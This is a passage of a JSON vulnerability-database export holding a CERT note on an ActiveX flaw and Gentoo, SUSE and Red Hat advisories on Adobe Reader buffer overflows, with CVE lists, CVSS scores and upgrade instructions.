Microsoft credits Golan Yosef of Finjan's Malicious Code Research Center (MCRC) with providing information regarding this vulnerability.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-0003](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0003>) \n---|--- \n**Date Public:** | 2006-04-11 \n**Date First Published:** | 2006-04-11 \n**Date Last Updated: ** | 2006-11-02 13:58 UTC \n**Document Revision: ** | 19 \n", "modified": "2006-11-02T13:58:00", "published": "2006-04-11T00:00:00", "id": "VU:234812", "href": "https://www.kb.cert.org/vuls/id/234812", "type": "cert", "title": "RDS.Dataspace ActiveX control bypasses ActiveX security model", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:16", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Reader: \n\n * Alin Rad Pop of Secunia Research reported a heap-based buffer overflow when processing PDF files containing a malformed JBIG2 symbol dictionary segment (CVE-2009-0193). \n * A buffer overflow related to a non-JavaScript function call and possibly an embedded JBIG2 image stream has been reported (CVE-2009-0658). \n * Tenable Network Security reported a stack-based buffer overflow that can be triggered via a crafted argument to the getIcon() method of a Collab object (CVE-2009-0927). \n * Sean Larsson of iDefense Labs reported a heap-based buffer overflow when processing a PDF file containing a JBIG2 stream with a size inconsistency related to an unspecified table (CVE-2009-0928). \n * Jonathan Brossard of the iViZ Security Research Team reported an unspecified vulnerability related to JBIG2 and input validation (CVE-2009-1061). 
\n * Will Dormann of CERT/CC reported a vulnerability leading to memory corruption related to JBIG2 (CVE-2009-1062). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted PDF document, possibly leading to the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-8.1.4\"", "edition": 1, "modified": "2009-04-18T00:00:00", "published": "2009-04-18T00:00:00", "id": "GLSA-200904-17", "href": "https://security.gentoo.org/glsa/200904-17", "type": "gentoo", "title": "Adobe Reader: User-assisted execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:50:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the Adobe Reader allowed attackers to crash acroread or even execute arbitrary code by tricking users into opening specially crafted PDF files. Please find more details at Adobe's site: http://www.adobe.com/support/security/bulletins/apsb09-04.html Note that Adobe did not provide updates for Adobe Reader 7 as used on NLD9. We cannot upgrade to newer versions due to library dependencies. We strongly encourage users of acroread on NLD9 to uninstall the package and to use an alternative, open source pdf viewer instead. 
We're currently evaluating the possibility of disabling acroread on NLD9 via online update.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-03-27T15:24:52", "published": "2009-03-27T15:24:52", "id": "SUSE-SA:2009:014", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00005.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-12-11T13:32:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2549", "CVE-2008-2992", "CVE-2008-4812", "CVE-2008-4813", "CVE-2008-4814", "CVE-2008-4815", "CVE-2008-4817", "CVE-2009-0927"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nSeveral input validation flaws were discovered in Adobe Reader. A malicious\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader. (CVE-2008-2549,\nCVE-2008-2992, CVE-2008-4812, CVE-2008-4813, CVE-2008-4814, CVE-2008-4817)\n\nThe Adobe Reader binary had an insecure relative RPATH (runtime library\nsearch path) set in the ELF (Executable and Linking Format) header. A local\nattacker able to convince another user to run Adobe Reader in an\nattacker-controlled directory could run arbitrary code with the privileges\nof the victim. (CVE-2008-4815)\n\nAll acroread users are advised to upgrade to these updated packages, that\ncontain Adobe Reader version 8.1.3, and are not vulnerable to these issues.", "modified": "2018-05-26T04:26:18", "published": "2008-11-12T05:00:00", "id": "RHSA-2008:0974", "href": "https://access.redhat.com/errata/RHSA-2008:0974", "type": "redhat", "title": "(RHSA-2008:0974) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}